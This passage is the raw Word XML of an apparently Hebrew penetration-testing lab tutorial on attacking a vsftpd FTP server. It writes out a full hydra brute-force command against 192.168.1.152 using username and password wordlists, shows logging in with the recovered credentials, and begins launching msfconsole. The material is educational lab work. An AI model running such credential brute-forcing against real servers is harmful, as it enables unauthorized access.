    <w:p w14:paraId="46CE186F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בשירות זה ננצל חולשה אבטחה בשרת </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">vsftpd </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> המאפשר כניסה למערכת דרך "דלת אחורית".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8C2673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תחילה ננסה למצוא את שם המשתמש והסיסמא של השרת עם כלי שנקרא </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>hydra</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> כלי מהיר לפיצוח סיסמאות </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AABF898" w14:textId="59483A83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(הכנתי מראש קובץ משתמשים וקובץ סיסמאות)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F99C0A" w14:textId="1916F86F" w:rsidR="0090322B" w:rsidRPr="007D51BF" w:rsidRDefault="0090322B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  <w:rtl/>
        </w:rPr>
        <w:t>ניתן להשתמש גם עם הקבצים האלו שנמצאים כבר ב</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21456843" w14:textId="270E8084" w:rsidR="0090322B" w:rsidRPr="007D51BF" w:rsidRDefault="0090322B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pacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>/share/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>workdlists</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>/unix_users.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785D4284" w14:textId="1D93808D" w:rsidR="0090322B" w:rsidRPr="007D51BF" w:rsidRDefault="0090322B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pacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>/share/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>workdlists</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>/unix_passwords.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB77644" w14:textId="65DB38C2" w:rsidR="001F7164" w:rsidRPr="007D51BF" w:rsidRDefault="0002686C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הסריקה עם הקבצים האלו יכולה לקחת המון הזמן.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326CD1EF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הפקודה: </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>hydra -L /home/</w:t>
      </w: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eliot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/Desktop/user -P /home/</w:t>
      </w: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eliot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">/Desktop/password ftp://192.168.1.152 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BE9B43" w14:textId="46B2937B" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="006E68E4">
      <w:pPr>
        <w:jc w:val="right"/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</w:rPr>
        <w:t xml:space="preserve">-L- list of </w:t>
      </w:r>
      <w:r w:rsidR="00D732F6" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>usernames</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337BFE1A" w14:textId="611DBE61" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="00931C77">
      <w:pPr>
        <w:jc w:val="right"/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 </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">list of </w:t>
      </w:r>
      <w:r w:rsidR="00D732F6" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>passwords</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3312D88C" w14:textId="4D236F3B" w:rsidR="00931C77" w:rsidRPr="007D51BF" w:rsidRDefault="00931C77" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2807B6DF" w14:textId="413774FD" w:rsidR="00931C77" w:rsidRPr="007D51BF" w:rsidRDefault="00931C77" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41832240" w14:textId="636EF7AF" w:rsidR="00931C77" w:rsidRPr="007D51BF" w:rsidRDefault="00E6416D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lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251831296" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="490C2B96" wp14:editId="3320D8D4">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-365125</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6637020" cy="1524000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="78" name="תמונה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00BA7" w14:textId="4E60E08D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0181259A" w14:textId="2B78179E" w:rsidR="0090322B" w:rsidRPr="007D51BF" w:rsidRDefault="0090322B" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="392ED0DB" w14:textId="77777777" w:rsidR="00211F0E" w:rsidRPr="007D51BF" w:rsidRDefault="00211F0E" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0218FFA0" w14:textId="0D98D6B2" w:rsidR="0090322B" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="0090322B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נמצאו 3 תוצאו</w:t>
      </w:r>
      <w:r w:rsidR="0090322B" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>ת.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41861365" w14:textId="7D2D1E12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כעת ננסה להתחבר לשרת ה</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ftp</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> עם השם משתמש והסיסמא שמצאנו</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA2DE0F" w14:textId="2A4630FD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במקרה הזה השתמשתי בשם משתמש </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> וסיסמא </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> אך גם האחרים יכולים לעבוד.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362DD385" w14:textId="75023E3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32320" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1F580534" wp14:editId="6100F6D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69820" cy="1478280"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:wrapNone/>
            <wp:docPr id="79" name="תמונה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868A4" w14:textId="6A89A498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E730E75" w14:textId="05AED0F9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3EFE5ECB" w14:textId="38EF7688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8849A27" w14:textId="13BD7818" w:rsidR="00C5490F" w:rsidRPr="007D51BF" w:rsidRDefault="00C5490F" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66B4E64A" w14:textId="07477D5E" w:rsidR="00497E2B" w:rsidRPr="007D51BF" w:rsidRDefault="00497E2B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ניתן להרחיב כאן על פקודות לשרת </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ftp</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44BCDEA0" w14:textId="010A6814" w:rsidR="000B193E" w:rsidRPr="007D51BF" w:rsidRDefault="009F468F" w:rsidP="00497E2B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidR="00C5490F" w:rsidRPr="007D51BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://www.serv-u.com/linux-ftp-server/commands</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="52BA108B" w14:textId="6559E1D3" w:rsidR="00831D32" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="00831D32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דרך נוספת לחדור לשרת ה</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ftp</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> באמצעות הכלי </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:r w:rsidR="00B06C42" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00831D32" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> הכלי מצויד במאגר נתונים ומאפשר מגוון רחב של  פגיעויות בהתאם למערכות הפעלה בנוסף יכולת איסוף נתונים, סריקת יעדים, וניצול חולשות אבטחה.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48500FDE" w14:textId="77777777" w:rsidR="00831D32" w:rsidRPr="007D51BF" w:rsidRDefault="00831D32" w:rsidP="00831D32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ניתן להרחיב כאן על פרויקט </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C6B32E" w14:textId="1B083D4B" w:rsidR="00831D32" w:rsidRPr="007D51BF" w:rsidRDefault="009F468F" w:rsidP="00831D32">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidR="00831D32" w:rsidRPr="007D51BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://he.wikipedia.org/wiki/Metasploit</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="42EADF61" w14:textId="1C506186" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="00B06C42" w:rsidP="00831D32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 </w:t>
      </w:r>
      <w:r w:rsidR="006E68E4" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>נעבור ל</w:t>
      </w:r>
      <w:r w:rsidR="006E68E4" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>kali</w:t>
      </w:r>
      <w:r w:rsidR="006E68E4" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> נפתח טרמינל חדש ונריץ את הפקודה: </w:t>
      </w:r>
      <w:r w:rsidR="006E68E4" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4788542B" w14:textId="0D4B304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 wp14:anchorId="4EFC5B98" wp14:editId="70B9C2A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091940" cy="2529840"/>
            <wp:effectExtent l="0" t="0" r="3810" b="381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DDD8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4C789AB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9D3F988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4189FD6" w14:textId="64704A2D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FB8AEE2" w14:textId="4900BE5F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0B19DB49" w14:textId="21490739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9FE486C" w14:textId="1FAEB84A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03FC26D3" w14:textId="3C6646C8" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="000B193E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17105A79" w14:textId="77777777" w:rsidR="00931C77" w:rsidRPr="007D51BF" w:rsidRDefault="00931C77" w:rsidP="00497E2B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FFA9F2E" w14:textId="77777777" w:rsidR="00931C77" w:rsidRPr="007D51BF" w:rsidRDefault="00931C77" w:rsidP="00497E2B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66E7AAA6" w14:textId="0E2B1835" w:rsidR="00931C77" w:rsidRPr="007D51BF" w:rsidRDefault="00931C77" w:rsidP="00497E2B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="264C5EE8" w14:textId="5AE19FDB" w:rsidR="00E6416D" w:rsidRPr="007D51BF" w:rsidRDefault="00E6416D" w:rsidP="00497E2B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CBE6988" w14:textId="77777777" w:rsidR="00E6416D" w:rsidRPr="007D51BF" w:rsidRDefault="00E6416D" w:rsidP="00497E2B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C1425C0" w14:textId="77777777" w:rsidR="00931C77" w:rsidRPr="007D51BF" w:rsidRDefault="00931C77" w:rsidP="00497E2B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="505A86BC" w14:textId="608A7E17" w:rsidR="00F832AF" w:rsidRPr="007D51BF" w:rsidRDefault="00211F0E" w:rsidP="00497E2B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lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251868160" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="054DBA81" wp14:editId="3AE2C051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2709976" cy="3072819"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="122" name="תמונה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76" cy="307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93E" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">בעזרת הפקודה </w:t>
      </w:r>
      <w:r w:rsidR="000B193E" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>help</w:t>
      </w:r>
      <w:r w:rsidR="000B193E" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> נוכל לראות את רשימת פקודות</w:t>
      </w:r>
      <w:r w:rsidR="00B06C42" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> של</w:t>
      </w:r>
      <w:r w:rsidR="00497E2B" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
